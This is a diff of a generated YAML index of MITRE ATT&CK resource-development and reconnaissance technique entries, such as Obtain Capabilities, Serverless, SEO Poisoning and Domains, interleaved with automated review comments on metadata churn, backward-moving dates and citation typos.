x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
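Review bot: `spec_version: '2.1'` is removed from the T1588 object here (the `- spec_version: '2.1'` line right before `atomic_tests: []`) and from every other technique touched in this diff, with nothing replacing it. STIX 2.1 requires `spec_version` on every SDO, so any consumer that validates these technique objects as STIX 2.1 will now reject them; confirm the new upstream bundle or the generator intentionally omits the field rather than losing it in the conversion. Everything else in this hunk is a key-order change (the `external_references` block deleted here reappears verbatim in the next hunk), so the only semantic change is the `modified` bump to 2024-09-16.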
@@ -90887,22 +91502,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
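Review bot: the `modified` date moves to 2024-09-16 while `x_mitre_version` stays at '1.1', and the only content difference in the re-added references is the Recorded Future entry: the URL changes from `https://www.recordedfuture.com/cobalt-strike-servers/` to `https://www.recordedfuture.com/research/cobalt-strike-servers` with the Retrieved date refreshed to September 16, 2024. That is a citation-only refresh, so the unchanged version is expected. The larger problem is churn: `external_references` migrates from above `modified` to below `x_mitre_data_sources`, and `revoked: false` / `x_mitre_deprecated: false` are interleaved in a new position, which turns a one-URL change into a 60-line hunk. If the generator emits keys in upstream dict order, sort keys on output so future regenerations stay reviewable.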
@@ -90965,37 +91624,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
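Review bot: the rewritten Serverless description adds `(Citation: GWS Apps Script Abuse 2021)`; its `external_references` entry is only added in the following hunk, so check both hunks land together or the citation key dangles. The version bump from '1.0' to '1.1' matches a substantive description change (new Google Apps Script example and the new link to Hide Infrastructure, T1665), which is correct. Minor upstream nit in the new text: the product is "Google Apps Script", not "Google Apps Scripts".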
@@ -91019,11 +91679,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
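Review bot: the new BleepingComputer URL ends in `#google_vignette`, which is the fragment injected by the site's ad interstitial when the page was captured, not part of the canonical article URL. It is harmless for navigation but will never match the same article cited elsewhere without the fragment, so deduplication on URL will miss it. Since this file is generated from the upstream ATT&CK data, fix it there (or normalise URL fragments in the generator) rather than hand-editing the index.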
@@ -91081,17 +91744,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
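Review bot: the added paragraph cites `(Citation: Chexmarx-seo)` with a misspelled vendor name, while the companion key a sentence later is `Checkmarx-oss-seo`. The key does resolve, because the `external_references` hunk further down defines `source_name: Chexmarx-seo` with the same typo, so any rename has to be applied in both places at once or the citation breaks. The same sentence is also missing a space and punctuation before the citation ("popularity(Citation: Chexmarx-seo) which may be"). Both are upstream text, so report them there rather than patching the generated file.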
@@ -91099,7 +91763,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -91113,7 +91777,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -91146,11 +91810,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -91172,7 +91843,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
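Review bot: `modified` for T1588.003 goes backwards here, from '2022-04-25T14:00:00.188Z' to '2021-10-17T16:19:50.018Z'. The 2022-04-25 timestamp is the bulk update in which upstream added `spec_version` and `x_mitre_attack_spec_version` to every object, and the next hunk removes exactly those two fields from this technique, so this looks like the object is being regenerated from an older copy rather than from the current bundle. The same regression appears later in this diff for T1588.005 (to 2021-04-15), T1596.003 (to 2021-04-15) and T1597.002 (to 2021-04-15), all of which also lose `x_mitre_attack_spec_version`. Check which STIX source the generator read for these four; a `modified` date should never decrease across a regeneration.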
@@ -91190,47 +91861,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
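Review bot: after this hunk T1588.003 carries neither `spec_version` nor `x_mitre_attack_spec_version`, while its siblings in the same diff (T1588, T1587, T1584.007, T1608.006, T1584.001) are moved to `x_mitre_attack_spec_version: 3.2.0`. Any consumer that branches on the attack spec version now sees a mixed dataset within one file. This reinforces the point above that the T1588.003 object came from a stale source; it should either be regenerated alongside the others or the field should be retained. The T1587 part of the hunk is the same reorder-and-re-add pattern as T1588 and is re-emitted in full in the next hunk.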
@@ -91239,21 +91873,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
@@ -91293,7 +91963,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -91312,15 +91982,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
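Review bot: the T1588.005 lines at the top of this hunk (`- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0`) drop both version fields with no replacement, the same regression already flagged for T1588.003, and should be resolved the same way. On the T1584.001 description change, the new example names the service as "AWS Route53"; the product is "Amazon Route 53" (with a space), an upstream nit. The substance of the addition is sound: Route 53 does handle both registration and hosted-zone records, so compromising the cloud account that manages it is a legitimate domain-hijack path, and the `x_mitre_version` bump to '1.4' in the following hunk matches the description change.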
@@ -91328,19 +91996,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -91374,55 +92042,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
